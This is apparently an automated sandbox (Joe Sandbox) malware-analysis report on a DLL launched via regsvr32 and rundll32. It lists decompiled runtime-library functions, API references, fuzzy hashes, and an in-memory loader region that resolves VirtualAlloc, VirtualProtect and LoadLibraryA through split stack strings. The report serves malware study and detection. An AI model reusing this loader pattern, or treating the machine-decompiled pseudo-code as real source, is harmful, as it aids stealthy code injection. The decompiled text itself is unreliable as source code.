				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t169;
				signed long long _t182;
				signed long long _t186;
				signed long long _t189;
				signed long long _t208;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t228;
				signed long long _t229;
				signed short* _t230;
				void* _t231;
				signed short* _t232;

				_t122 = __ebx;
				r15d = r8d;
				_t186 = __r9;
				_t230 = __rdx;
				if (r8d == 0) goto 0xae71599;
				if (__rdx != 0) goto 0xae71303;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t209;
				E00007FFA7FFA0AE69674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
				goto 0xae7159b;
				_t189 = __ecx >> 6;
				_v120 = _t189;
				_t229 = __ecx + __ecx * 8;
				if (_t210 - 1 - 1 > 0) goto 0xae71339;
				if (( !r15d & 0x00000001) == 0) goto 0xae712cc;
				if (( *( *((intOrPtr*)(0xaedf940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0xae7134f;
				r8d = 0x7ffa0aedf942;
				E00007FFA7FFA0AE71E38(r12d);
				_v96 = _t209;
				if (E00007FFA7FFA0AE716A0(r12d, __ecx) == 0) goto 0xae71485;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xaedf940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0xae71485;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0xae71396;
				0xae69140();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0xae713b2;
				_t182 =  *((intOrPtr*)(0xaedf940 + _v120 * 8));
				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0xae71485;
				if (GetConsoleMode(??, ??) == 0) goto 0xae7147a;
				if (sil == 0) goto 0xae71457;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0xae7151e;
				_t228 = _t230 + _t231;
				_v112 = _t209;
				_t232 = _t230;
				if (_t230 - _t228 >= 0) goto 0xae71514;
				_v80 =  *_t232 & 0x0000ffff;
				_t107 = E00007FFA7FFA0AE71E40( *_t232 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0xae71449;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0xae7143a;
				if (E00007FFA7FFA0AE71E40(0xd) != 0xd) goto 0xae71449;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t232[1]) - _t228 >= 0) goto 0xae71514;
				goto 0xae713fa;
				_v112 = GetLastError();
				goto 0xae71514;
				r9d = r15d;
				_v136 = __r9;
				E00007FFA7FFA0AE70958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
				asm("movsd xmm0, [eax]");
				goto 0xae71519;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xaedf940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0xae714e1;
				_t169 = sil;
				if (_t169 == 0) goto 0xae714cd;
				if (_t169 == 0) goto 0xae714b9;
				if (_t147 - 1 != 1) goto 0xae71529;
				r9d = r15d;
				E00007FFA7FFA0AE70EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0xae7146e;
				r9d = r15d;
				E00007FFA7FFA0AE71004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
				goto 0xae7146e;
				r9d = r15d;
				E00007FFA7FFA0AE70DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0xae7146e;
				r8d = r15d;
				_v136 = _v136 & _t182;
				_v112 = _t182;
				_v104 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0xae71511;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0xae71592;
				_t117 = _v96;
				if (_t117 == 0) goto 0xae71568;
				if (_t117 != 5) goto 0xae71558;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
				 *((char*)(_t186 + 0x38)) = 1;
				 *(_t186 + 0x34) = _t117;
				goto 0xae712fb;
				_t208 = _t186;
				E00007FFA7FFA0AE6B3DC(_v96, _t208);
				goto 0xae712fb;
				if (( *( *((intOrPtr*)(0xaedf940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0xae7157a;
				if ( *_t230 == 0x1a) goto 0xae71599;
				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
				 *((char*)(_t186 + 0x38)) = 1;
				goto 0xae712fb;
				goto 0xae7159b;
				return 0;
			}

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0AE7123C), ref: 00007FFA0AE713BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0AE7123C), ref: 00007FFA0AE71449

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction ID: 2aa4956cb2eb297d7e65a69c636beaa34fa99894a72eda82d3b55ebaaa463918
Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction Fuzzy Hash: 1A91BF73E1877289FB50EB75E4806BD27A1BB06B98F448276DE0E576A4EF38D485C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61CE0 Relevance: 6.1, APIs: 4, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E00007FFA7FFA0AE61CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr _t62;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA0AE62250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0xae61d3a;
				E00007FFA7FFA0AE618F0(__rax, _a8);
				_t48 = _a16 - __rax;
				E00007FFA7FFA0AE61DF0(_t48, _a8, _a8, _t48, _a24);
				goto 0xae61de7;
				E00007FFA7FFA0AE62170(_t48, _a8);
				_t62 =  *0xaeda228; // 0xffffffffffffffff
				_t50 = _t62 -  *_t48;
				if (_t50 - _a24 > 0) goto 0xae61d65;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170(_t50, _a8);
				_t52 =  *_t50 + _a24;
				_v24 = _t52;
				if (_a24 <= 0) goto 0xae61de2;
				r8d = 0;
				if ((E00007FFA7FFA0AE622B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0xae61de2;
				E00007FFA7FFA0AE618F0(_t52, _a8);
				_v16 = _t52;
				E00007FFA7FFA0AE62170(_t52, _a8);
				E00007FFA7FFA0AE611E0(_v16 +  *_t52, _a16, _a24);
				return E00007FFA7FFA0AE623A0(_v16 +  *_t52, _a8, _v24);
			}

APIs

Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6226B
Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61D0E

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Part of subcall function 00007FFA0AE61DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE61E56
Part of subcall function 00007FFA0AE61DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61E98
Part of subcall function 00007FFA0AE61DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61EAC
Part of subcall function 00007FFA0AE61DF0: char_traits.LIBCPMTD ref: 00007FFA0AE61EDB

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE61D60
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61DA2
char_traits.LIBCPMTD ref: 00007FFA0AE61DCE

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
String ID:
API String ID: 3922470843-0
Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction ID: 454d22d4e14c2744f49e573a68d783f2be9ad4f51439828d196aa570f3f3009f
Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction Fuzzy Hash: 8721C033A1CA9581DA10EB66F85116FA370FBC6BC4F508576EB8D87B6ADE3DD5008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61DF0 Relevance: 6.1, APIs: 4, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA0AE61DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t44;
				intOrPtr* _t49;
				intOrPtr* _t51;
				long long _t53;
				intOrPtr* _t54;
				intOrPtr _t61;

				_t49 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE621F0(_t44, __rax, _a16, _a24);
				E00007FFA7FFA0AE62400(_t44, __rax, _a16, _a24, _a32);
				_a32 = _t49;
				E00007FFA7FFA0AE62170(_t49, _a8);
				_t61 =  *0xaeda228; // 0xffffffffffffffff
				_t51 = _t61 -  *_t49;
				if (_t51 - _a32 > 0) goto 0xae61e5b;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170(_t51, _a8);
				_t53 =  *_t51 + _a32;
				_v40 = _t53;
				if (_a32 <= 0) goto 0xae61eef;
				r8d = 0;
				if ((E00007FFA7FFA0AE622B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0xae61eef;
				E00007FFA7FFA0AE618D0(_t53, _a16);
				_t54 = _t53 + _a24;
				_v24 = _t54;
				E00007FFA7FFA0AE618F0(_t54, _a8);
				_v32 = _t54;
				E00007FFA7FFA0AE62170(_t54, _a8);
				E00007FFA7FFA0AE611E0(_v32 +  *_t54, _v24, _a32);
				return E00007FFA7FFA0AE623A0(_v32 +  *_t54, _a8, _v40);
			}

APIs

Part of subcall function 00007FFA0AE621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE62217

Part of subcall function 00007FFA0AE62170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE61E56
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61E98
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61EAC
char_traits.LIBCPMTD ref: 00007FFA0AE61EDB

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 3679362534-0
Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction ID: b018cfa13724e8403aa0d6b3f0525dbc92218e4b7900b6e90e50aed15797ff53
Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction Fuzzy Hash: B321F833A1CB9581DA10EB66F49116EA760FBC5BD0F008572EB8D87B6ADE7CD4508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE71004 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FFA7FFA0AE71004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				void* __rdi;
				void* __rsi;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				intOrPtr* _t74;
				intOrPtr* _t76;
				void* _t84;
				void* _t88;
				signed short* _t89;
				void* _t91;
				void* _t94;
				signed short* _t97;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t106;
				void* _t107;

				_t97 = __r8;
				_t76 = __rcx;
				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFA7FFA0AE72DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
				_t62 =  *0xaede008; // 0x81ced31fdcd6
				_a5176 = _t62 ^ _t94 - __rax;
				_t74 = _t76;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t107 = _t106 + _t97;
				_t89 = _t97;
				 *_t74 =  *((intOrPtr*)(0xaedf940 + (__edx >> 6) * 8));
				 *((intOrPtr*)(_t74 + 8)) = 0;
				if (_t97 - _t107 >= 0) goto 0xae71145;
				_t67 =  &_a40;
				if (_t89 - _t107 >= 0) goto 0xae710ae;
				_t41 =  *_t89 & 0x0000ffff;
				if (_t41 != 0xa) goto 0xae7109a;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0xae7107c;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FFA7FFA0AE6D698();
				if (0 == 0) goto 0xae7113d;
				if (0 == 0) goto 0xae7112d;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xae7113d;
				if (0 + _a24 < 0) goto 0xae710fa;
				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
				goto 0xae71071;
				 *_t74 = GetLastError();
				return E00007FFA7FFA0AE63A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
			}

APIs

WriteFile.KERNEL32 ref: 00007FFA0AE7111B
GetLastError.KERNEL32 ref: 00007FFA0AE7113D

Strings

U, xrefs: 00007FFA0AE710C7

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction ID: 496be4169bae5c83d3ce570ce30bf7b4799ed534f2359059ec16b72c446e4a2d
Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction Fuzzy Hash: 3E418123A18B9185DB209F25F4943BA67A0FB99B94F848131EE4D87798EF3CD441C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE72EB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA0AE72EB4(intOrPtr* __rcx) {
				void* __rbx;
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t3 = E00007FFA7FFA0AE66B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xae72ed5;
				if ( *__rcx != 0xe06d7363) goto 0xae72ed5;
				if (_t3 == 1) goto 0xae72edb;
				return _t3;
			}

0x7ffa0ae72ebd
0x7ffa0ae72ec6
0x7ffa0ae72ece
0x7ffa0ae72ed3
0x7ffa0ae72eda

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFA0AE72EBD

Part of subcall function 00007FFA0AE66B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFA0AE66C0C
Part of subcall function 00007FFA0AE66B4C: RtlUnwindEx.KERNEL32 ref: 00007FFA0AE66C5B

Strings

csm, xrefs: 00007FFA0AE72EC8
f, xrefs: 00007FFA0AE72EC2

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 1396615161-629598281
Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction ID: 13eafb7d1be8673f02c017ecfefad48c481eb6816eeb0157fd4063b1f454d825
Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction Fuzzy Hash: 05D05E63C0815686FB3A3771B0852BC05988F1E764F58D8B0CA6C052877E1D98D04601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE73ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FFA0AE73F22
RegisterClassExW.USER32 ref: 00007FFA0AE73F59

Strings

P, xrefs: 00007FFA0AE73ED9

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction ID: efa39de0469584e658b6b99616b1778a27e6633d41b9ce8097d7160ff525c0f1
Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction Fuzzy Hash: 3101B232519B8186E760DF10F89831BB7B4F789748F604129E6CD86BA8EFBDD158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6472C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6472C(void* __eflags, void* __rax) {
				char _v40;
				void* _t6;
				void* _t11;
				void* _t12;
				char* _t14;
				void* _t16;

				E00007FFA7FFA0AE645C0(__rax,  &_v40);
				_t14 =  &_v40;
				_t6 = E00007FFA7FFA0AE66E00(_t12, _t14, 0xaedcbd8, _t16);
				asm("int3");
				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
				return _t6;
			}

0x7ffa0ae64735
0x7ffa0ae64741
0x7ffa0ae64746
0x7ffa0ae6474b
0x7ffa0ae64758
0x7ffa0ae6475d

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFA0AE64735
_CxxThrowException.LIBVCRUNTIME ref: 00007FFA0AE64746

Part of subcall function 00007FFA0AE66E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA0AE6472B), ref: 00007FFA0AE66E7D
Part of subcall function 00007FFA0AE66E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA0AE6472B), ref: 00007FFA0AE66EBC

Strings

Unknown exception, xrefs: 00007FFA0AE64751

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction ID: cde5bd40118be019f07a144e98529c7a44922b9d3cf026b8397d2034d8eb4220
Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction Fuzzy Hash: ABD05B2361495591DE10FB20F44039C6330FB8274CF90C972D14D415B1FF2CD646C340

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 1648, Parent PID: 1408COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	2

Executed Functions

Function 000001F1B4D60000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 000001F1B4D60344
VirtualAlloc.KERNELBASE ref: 000001F1B4D6038A
VirtualProtect.KERNELBASE ref: 000001F1B4D6085C
RtlAddFunctionTable.KERNEL32 ref: 000001F1B4D608E9

Strings

hIns, xrefs: 000001F1B4D600EB
nf, xrefs: 000001F1B4D60127
ddFu, xrefs: 000001F1B4D6013A
Libr, xrefs: 000001F1B4D6009D
o, xrefs: 000001F1B4D6012E
ncti, xrefs: 000001F1B4D60141
Cach, xrefs: 000001F1B4D60100
Slee, xrefs: 000001F1B4D60084
ativ, xrefs: 000001F1B4D6010F
Flus, xrefs: 000001F1B4D600E4
temI, xrefs: 000001F1B4D6011F
rote, xrefs: 000001F1B4D600D5
ualA, xrefs: 000001F1B4D600B5
GetN, xrefs: 000001F1B4D60107
ct, xrefs: 000001F1B4D600DD
Load, xrefs: 000001F1B4D60095
onTa, xrefs: 000001F1B4D60148
Virt, xrefs: 000001F1B4D600C5
truc, xrefs: 000001F1B4D600F2
tion, xrefs: 000001F1B4D600F9
ualP, xrefs: 000001F1B4D600CD
RtlA, xrefs: 000001F1B4D60133
aryA, xrefs: 000001F1B4D600A5
lloc, xrefs: 000001F1B4D600BD
eSys, xrefs: 000001F1B4D60117
Virt, xrefs: 000001F1B4D600AD

Memory Dump Source

Source File: 00000004.00000002.314687590.000001F1B4D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F1B4D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f1b4d60000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 66693bf8bd5e8f158959fad7c9d559d5daef672de28264254d78854fc61e6078
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 3762E330658B09DBD75ADF18C8857B9B7F1FB65300F148A2DE88AC7251DB34E542CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000004.00000002.312680060.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

